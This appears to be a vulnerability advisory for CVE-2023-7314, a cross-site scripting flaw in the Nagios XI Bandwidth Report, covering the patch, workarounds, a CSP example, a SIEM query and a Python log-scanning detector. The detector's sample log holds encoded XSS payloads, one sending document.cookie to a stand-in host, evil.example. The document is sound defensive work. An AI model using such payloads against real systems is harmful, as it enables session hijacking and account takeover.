CVE-2023-7314
📋 TL;DR
Nagios XI versions before 5.11.3 contain a cross-site scripting vulnerability in the Bandwidth Report component. Insufficient input validation allows attackers to inject malicious scripts that execute in victims' browsers when viewing reports. This affects all Nagios XI administrators and users who access bandwidth reports.
💻 Affected Systems
- Nagios XI
📦 What is this software?
Nagios XI by Nagios: a commercial IT infrastructure monitoring platform built on Nagios Core, administered through a PHP web interface. The Bandwidth Report component is one of its installable reporting extensions.
⚠️ Risk & Real-World Impact
Worst Case
An attacker could steal administrator session cookies, perform actions as authenticated users, or redirect users to malicious sites, potentially leading to full system compromise if combined with other vulnerabilities.
Likely Case
Attackers steal session cookies or credentials from authenticated users, gaining unauthorized access to the Nagios XI interface with the victim's privileges.
If Mitigated
With proper input validation and output encoding, malicious scripts are neutralized before execution, preventing exploitation.
🎯 Exploit Status
Exploitation requires the attacker to trick an authenticated user into visiting a maliciously crafted bandwidth report URL or page.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.11.3
Vendor Advisory: https://www.nagios.com/changelog/nagios-xi/
Restart Required: No
Instructions:
1. Back up the current Nagios XI installation.
2. Download Nagios XI 5.11.3 or later from the Nagios customer portal.
3. Follow the official upgrade guide at https://assets.nagios.com/downloads/nagiosxi/docs/Upgrading-Nagios-XI.pdf.
4. Verify that the upgrade completed and that the installed version is 5.11.3 or higher.
🔧 Temporary Workarounds
Disable Bandwidth Report Component
Temporarily disable the vulnerable Bandwidth Report component until patching is possible.
Navigate to Admin > System Extensions > Manage Components, find 'Bandwidth Report' and disable it
Implement Web Application Firewall (WAF)
Deploy a WAF with XSS protection rules in front of the Nagios XI interface to block malicious payloads. Treat this as a stopgap only: signature rules can be bypassed with encoded or obfuscated payloads, so a WAF reduces exposure but does not remove the underlying flaw.
🧯 If You Can't Patch
- Restrict access to Nagios XI interface to trusted networks only using firewall rules.
- Implement Content Security Policy (CSP) headers to mitigate script injection impact.
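The following Apache configuration fragment is an added example of the CSP mitigation listed above; it is not from Nagios or the original page. It assumes Apache httpd with mod_headers enabled and Nagios XI served under the stock /nagiosxi/ path, and the /csp-report collector endpoint is assumed to exist. It starts in report-only mode on purpose: the Nagios XI interface relies on inline scripts, and an enforced policy without 'unsafe-inline' can break pages.

```apache
# Added example, not part of Nagios XI or the original advisory.
# Assumes: mod_headers is loaded, Nagios XI lives under /nagiosxi/, and
# /csp-report is a collector endpoint you operate (assumption).
<Location /nagiosxi/>
    # Phase 1: report-only. Nothing is blocked; violations are reported so you
    # can see which inline scripts and external sources the UI actually needs.
    Header always set Content-Security-Policy-Report-Only "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'; report-uri /csp-report"

    # Phase 2 (only after the report-only run is clean): enforce the same policy.
    # Header always set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'"
</Location>
```

If the report-only run shows the UI cannot work without 'unsafe-inline' in script-src, understand that adding it removes most of the protection against a reflected script injection; the header is then defense in depth, not a fix. Marking the PHP session cookie HttpOnly (session.cookie_httponly in php.ini) is a separate, low-risk control that limits the cookie-theft outcome described under Worst Case.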
🔍 How to Verify
Check if Vulnerable:
Check Nagios XI version in Admin > System Profile. If version is below 5.11.3, the system is vulnerable.
Check Version:
cat /usr/local/nagiosxi/var/xiversion   # prints the installed version; compare against 5.11.3
Verify Fix Applied:
After upgrade, verify version is 5.11.3 or higher in Admin > System Profile and test Bandwidth Report functionality.
📡 Detection & Monitoring
Log Indicators:
- Unusual GET/POST requests to bandwidth report URLs with script tags or JavaScript payloads in parameters
- A successful login or reuse of an existing session from a new IP address or user agent shortly after that user viewed a bandwidth report (possible replay of a stolen session cookie)
Network Indicators:
- HTTP requests containing <script> tags or JavaScript in URL parameters to Nagios XI bandwidth report endpoints
SIEM Query (match both literal and URL-encoded forms; browsers and tools send the payload encoded, so a literal-only match misses most real attempts):
source="nagios_access.log" AND (uri_path="/nagiosxi/reports/bandwidth.php" OR uri_path="/nagiosxi/includes/components/bandwidth/*") AND (query="*<script*" OR query="*%3Cscript*" OR query="*javascript:*" OR query="*javascript%3A*")
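The script below is an added example of the detection logic above run over constructed access-log lines; it is not code from Nagios or the original page. It decodes the query string before matching, which is what the raw SIEM string match cannot do, and it shows that a literal `<script>` search misses a percent-encoded payload. The endpoint paths are the ones listed on this page and are treated as assumptions; the log lines are constructed, not captured traffic.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format lines for this example (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2023:10:01:02 +0000] "GET /nagiosxi/reports/bandwidth.php?host=localhost HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Dec/2023:10:02:15 +0000] "GET /nagiosxi/reports/bandwidth.php?host=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Dec/2023:10:02:40 +0000] "GET /nagiosxi/reports/bandwidth.php?host=x%22%20onmouseover%3D%22fetch('http://evil.example/'%2Bdocument.cookie) HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Dec/2023:10:03:00 +0000] "GET /nagiosxi/index.php?q=%3Cscript%3E HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoint paths as listed on this page (assumption: verify against your install).
BANDWIDTH_PATHS = (
    "/nagiosxi/reports/bandwidth.php",
    "/nagiosxi/includes/components/bandwidth/",
)

# Patterns checked against the *decoded* query string, case-insensitive.
XSS_PATTERNS = [
    re.compile(r"<\s*script", re.I),            # <script ...>
    re.compile(r"javascript\s*:", re.I),        # javascript: URLs
    re.compile(r"\bon[a-z]+\s*=", re.I),        # onload=, onmouseover=, ...
    re.compile(r"<\s*(svg|img|iframe)\b", re.I),  # common event-handler carriers
]


def decode_query(q: str) -> str:
    """Percent-decode twice so %253C (double-encoded '<') is also exposed.
    The second pass turns '+' into a space, which is harmless for matching."""
    for _ in range(2):
        q = unquote_plus(q)
    return q


def is_bandwidth_path(path: str) -> bool:
    return any(path == p or path.startswith(p) for p in BANDWIDTH_PATHS)


def find_xss_hits(log_text: str) -> list:
    """Return one dict per request to a bandwidth endpoint whose decoded
    query string matches an XSS pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not is_bandwidth_path(parts.path):
            continue
        decoded = decode_query(parts.query)
        matched = [p.pattern for p in XSS_PATTERNS if p.search(decoded)]
        if matched:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": parts.path,
                "query": decoded,
                "patterns": matched,
            })
    return hits


def naive_literal_match(log_text: str) -> int:
    """What the literal SIEM match sees: raw lines containing '<script>' or
    'javascript:' without decoding. Encoded payloads slip past this."""
    return sum(
        1 for line in log_text.splitlines()
        if "<script>" in line or "javascript:" in line
    )


if __name__ == "__main__":
    for hit in find_xss_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['path']} -> {hit['patterns']}")
    print("literal-only matches:", naive_literal_match(SAMPLE_LOG))
```

The decoded match flags both requests from 10.0.0.9 (a script tag and an event-handler injection), while the literal match flags nothing, because both payloads arrived percent-encoded. The event-handler pattern can fire on a legitimate parameter whose name starts with "on"; tune it to your query parameters rather than dropping it.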